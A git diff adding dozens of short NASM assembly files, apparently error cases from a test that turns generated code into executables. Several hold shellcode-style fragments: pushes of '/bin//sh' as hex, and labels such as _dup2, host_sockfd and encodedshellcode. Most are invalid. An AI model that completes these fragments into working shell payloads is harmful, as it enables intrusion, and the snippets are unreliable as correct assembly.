a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_230.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_230.obj new file mode 100644 index 0000000000000000000000000000000000000000..fabe9fbb9142b27e5f4f1720fc07676abde2c1b9 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_230.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_238.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_238.asm new file mode 100644 index 0000000000000000000000000000000000000000..a918e8776b6fc794fe03e4c7db534d1fd511bbab --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_238.asm @@ -0,0 +1,22 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov al, 0x68732f2f + mov al, 0x68732f + mov al, 0x6e69622f + mov al, 0x69622f + mov al, 0x69622f + mov al, 0x69622f + mov al, 0x69622f + mov al, 0x6e69622f + mov al, 0x69622f + mov al, 0x6e69622f + mov al, 0x69622 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_238.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_238.obj new file mode 100644 index 0000000000000000000000000000000000000000..06f10ab199ca0add115500e4739a1b135f416b85 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_238.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_240.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_240.asm new file mode 100644 index 0000000000000000000000000000000000000000..0ae697347dbda7f524eff31dc1bd568a250e963e --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_240.asm @@ -0,0 +1,16 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x68732f2f + push 0x6e69622f + push 0x69622f + push 0x69622f + push 0x69622f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_240.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_240.obj new file mode 100644 index 0000000000000000000000000000000000000000..7e987786e6e6fe9b4d720fed088f99d678f87ae8 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_240.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_242.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_242.asm new file mode 100644 index 0000000000000000000000000000000000000000..beb981a60c3064b37a45f38c7b62f3afa5d2cd1a --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_242.asm @@ -0,0 +1,25 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + section + uninitialized: db 0x68732f2f + db 0x6e69622f + db 0x69622f + db 0x69622f + db 0x69622f + db 0x69622f + db 0x69622f + db 0x69622f + db 0x69622f + db 0x69622f + db 0x69622f + db 0x69622f2f + db 0x69622 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_242.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_242.obj new file mode 100644 index 0000000000000000000000000000000000000000..acab6c79f300dd84ac6385fd111ed7d435d51345 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_242.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_245.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_245.asm new file mode 100644 index 0000000000000000000000000000000000000000..da3afc6001eae93490ec42222f6b9bceb8fa15e7 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_245.asm @@ -0,0 +1,13 @@ +section .data + +args equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov ecx, args + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_245.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_245.obj new file mode 100644 index 0000000000000000000000000000000000000000..bccc454b111400ff7bce32a0cdf891b9b28600d2 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_245.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_247.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_247.asm new file mode 100644 index 0000000000000000000000000000000000000000..074a1ce6aff55788eb824f3a235ec72409cd66ac --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_247.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + db '0c6h' + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_247.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_247.obj new file mode 100644 index 0000000000000000000000000000000000000000..d4295780d4a163324bfd5adf66c4f8badcaefc39 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_247.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_25.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_25.asm new file mode 100644 index 0000000000000000000000000000000000000000..9f531e87d642359a5565a49bb62404a61c7e3b76 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_25.asm @@ -0,0 +1,13 @@ +section .data + +byte_tbl equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov al, byte_tbl+2 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_25.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_25.obj new file mode 100644 index 0000000000000000000000000000000000000000..0eafbecc148c35ce711dfa2a0a28633037e02014 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_25.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_250.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_250.asm new file mode 100644 index 0000000000000000000000000000000000000000..ca8dddcd89b8f38b42ccd2fee5857b021c0f6128 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_250.asm @@ -0,0 +1,13 @@ +section .data + +_decode equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jz _decode + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_250.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_250.obj new file mode 100644 index 0000000000000000000000000000000000000000..bf8f2c1dd8927ee5224095e066375c4b40460988 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_250.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_255.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_255.asm new file mode 100644 index 0000000000000000000000000000000000000000..b89dc003ad23b2c23aa8fea9f625ab2016053303 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_255.asm @@ -0,0 +1,13 @@ +section .data + +host_sockfd equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push host_sockfd + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_255.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_255.obj new file mode 100644 index 0000000000000000000000000000000000000000..bce460220a322180b00c77a02f9d22e2564abe72 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_255.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_258.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_258.asm new file mode 100644 index 0000000000000000000000000000000000000000..fe13b33f6393b95576b50cbb042ffd39889a2ab4 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_258.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + _dup2: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_258.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_258.obj new file mode 100644 index 0000000000000000000000000000000000000000..d5cd0a2911031d658e9d926527072f63fc62ebab Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_258.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_259.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_259.asm new file mode 100644 index 0000000000000000000000000000000000000000..d8336428bb024aa98ed931247493501828c5cdf6 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_259.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + _three: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_259.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_259.obj new file mode 100644 index 0000000000000000000000000000000000000000..9696f5465e47cf561d005982c24ddf873601d464 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_259.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_260.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_260.asm new file mode 100644 index 0000000000000000000000000000000000000000..870413d941a6c160bd53996031224ecbde9e7ec7 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_260.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp short esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_260.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_260.obj new file mode 100644 index 0000000000000000000000000000000000000000..8f571f0ed5967d31dc8969775c7e892dd35bb3c6 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_260.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_262.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_262.asm new file mode 100644 index 0000000000000000000000000000000000000000..6db070e6cbf892b4ecc26f36eb28c9d574f75be9 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_262.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + _wrap_around: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_262.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_262.obj new file mode 100644 index 0000000000000000000000000000000000000000..e8883039745506c79f37314234280fe33b42d3ab Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_262.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_263.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_263.asm new file mode 100644 index 0000000000000000000000000000000000000000..69c3e1ce514bc0a4778c6a2b3e9cfb88719b398a --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_263.asm @@ -0,0 +1,14 @@ +section .data + +loc_402B1D equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp bl, 78h + jge loc_402B1D + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_263.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_263.obj new file mode 100644 index 0000000000000000000000000000000000000000..69dda8da490009b0518541044f8e62acfc204403 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_263.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_265.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_265.asm new file mode 100644 index 0000000000000000000000000000000000000000..9107b7234dade6cb8137c4ffe9febf563e684da0 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_265.asm @@ -0,0 +1,25 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x68732f + push 0x68732f + push 0x6e69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_265.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_265.obj new file mode 100644 index 0000000000000000000000000000000000000000..60157554125f6e6c5eca8fe9e1077c41a4e711ae Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_265.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_266.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_266.asm new file mode 100644 index 0000000000000000000000000000000000000000..72a9327168aeb49c86ab7556b7877398587105fb --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_266.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + read_label: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_266.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_266.obj new file mode 100644 index 0000000000000000000000000000000000000000..8b746d4fa030dfc8536a270d89135c6b43f6fe7e Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_266.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_27.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_27.asm new file mode 100644 index 0000000000000000000000000000000000000000..f129062170b2e0e2ac1237e4684eda9294ca5ea9 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_27.asm @@ -0,0 +1,13 @@ +section .data + +y equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov ebx, y + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_27.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_27.obj new file mode 100644 index 0000000000000000000000000000000000000000..b3c5865fd4a72bdf0270f4b905e736b0a8ac3ea3 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_27.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_270.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_270.asm new file mode 100644 index 0000000000000000000000000000000000000000..2bc372bf46d0d8ba4042d0396b0ae9061f0ca49c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_270.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor edx, edx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_270.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_270.obj new file mode 100644 index 0000000000000000000000000000000000000000..2be3faf5459f48452bc81c078bc12beeb7636464 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_270.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_274.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_274.asm new file mode 100644 index 0000000000000000000000000000000000000000..344dd278448859a1465650b331651c4b43cc1424 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_274.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor edx, edx + push edx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_274.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_274.obj new file mode 100644 index 0000000000000000000000000000000000000000..ff3273444e394bfa5a64d50d4895b2d20ccb280b Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_274.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_275.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_275.asm new file mode 100644 index 0000000000000000000000000000000000000000..3c97bbc1fc4509e8426f1d65a5d693a83bbff8a6 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_275.asm @@ -0,0 +1,14 @@ +section .data + +encodedshellcode equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor bl, 0xaa + jnz encodedshellcode + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_275.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_275.obj new file mode 100644 index 0000000000000000000000000000000000000000..3d84182396413f472fe4060e151304548df41b35 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_275.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_28.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_28.asm new file mode 100644 index 0000000000000000000000000000000000000000..7a57ffa56610865bdc234a06aac71d3b0b7553b0 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_28.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + duploop_label: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_28.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_28.obj new file mode 100644 index 0000000000000000000000000000000000000000..eda05043f5bbf5faaec4b40539ac8bab8cd5f5c7 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_28.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_280.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_280.asm new file mode 100644 index 0000000000000000000000000000000000000000..0dadb60431ef97f931fea623bde3ee308b7a3ccc --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_280.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor edx, edx + mov byte [edx], 5 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_280.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_280.obj new file mode 100644 index 0000000000000000000000000000000000000000..36428cca4337ee8af897bd6e0ff5c614e7fae89d Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_280.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_281.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_281.asm new file mode 100644 index 0000000000000000000000000000000000000000..1fca1ecd4fd72d8cfaa760d3b679fa600c8f9259 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_281.asm @@ -0,0 +1,13 @@ +section .data + +_stage equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp short _stage + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_281.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_281.obj new file mode 100644 index 0000000000000000000000000000000000000000..1c0f40ed2453db3940f228832190ec3a64c77601 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_281.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_287.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_287.asm new file mode 100644 index 0000000000000000000000000000000000000000..e560492c6541392ae6d8235433a6c480bb1be0eb --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_287.asm @@ -0,0 +1,25 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x68732f2f + push 0x68732f + push 0x6e69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x6e69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_287.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_287.obj new file mode 100644 index 0000000000000000000000000000000000000000..c535a12f7c79e0338962f7d151333b81579823a7 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_287.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_289.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_289.asm new file mode 100644 index 0000000000000000000000000000000000000000..eb3192b3f739ebdbd0b5f8a0ddc2704df81f28ff --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_289.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov edx, eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_289.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_289.obj new file mode 100644 index 0000000000000000000000000000000000000000..43e9cb16eb6098230587fa7fc405c2b48954194b Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_289.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_290.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_290.asm new file mode 100644 index 0000000000000000000000000000000000000000..e093b6ed3fd527a82f72bb9c398ba70730358ed7 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_290.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + message db 'hello world!' + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_290.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_290.obj new file mode 100644 index 0000000000000000000000000000000000000000..bd70dd22feb13cc1b107d42eb66c0f25fc97ec98 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_290.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_297.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_297.asm new file mode 100644 index 0000000000000000000000000000000000000000..527bf903bb66a556a9e349b19397364ab6eb5492 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_297.asm @@ -0,0 +1,15 @@ +section .data + +notdecode equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp bl, 0xbb + jge xordecode + jmp notdecode + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_3.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_3.asm new file mode 100644 index 0000000000000000000000000000000000000000..9107b7234dade6cb8137c4ffe9febf563e684da0 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_3.asm @@ -0,0 +1,25 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x68732f + push 0x68732f + push 0x6e69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_3.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_3.obj new file mode 100644 index 0000000000000000000000000000000000000000..428db22960ca5852ebeb0c58aa706b1fc958b00e Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_3.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_305.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_305.asm new file mode 100644 index 0000000000000000000000000000000000000000..03313c95fad31286aba34b30e76b830054542239 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_305.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov al, 0x68732f2f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_305.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_305.obj new file mode 100644 index 